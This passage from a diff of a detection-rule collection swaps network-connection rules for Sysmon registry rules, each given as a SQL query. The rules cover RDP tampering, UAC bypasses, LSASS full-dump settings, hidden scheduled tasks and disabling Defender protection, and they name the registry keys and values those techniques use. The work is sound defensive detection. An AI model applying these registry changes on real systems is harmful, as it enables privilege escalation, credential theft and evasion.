+ }, + { + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD 
(0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "author": "frack113", + "description": "Detects the abuse of the exefile handler in new file association. 
Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "status": "test", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218.003" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE 
'%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "status": "test", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + ], + "filename": "registry_set_comhijack_sdclt.yml" + }, + { + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence", + "attack.t1547.010" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "status": "experimental", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.impact", - "attack.t1496" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin 
Songer @austinsonger", "tags": [ - "attack.lateral_movement" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1053.005" ], 
"falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. 
Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "status": "experimental", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' 
AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": 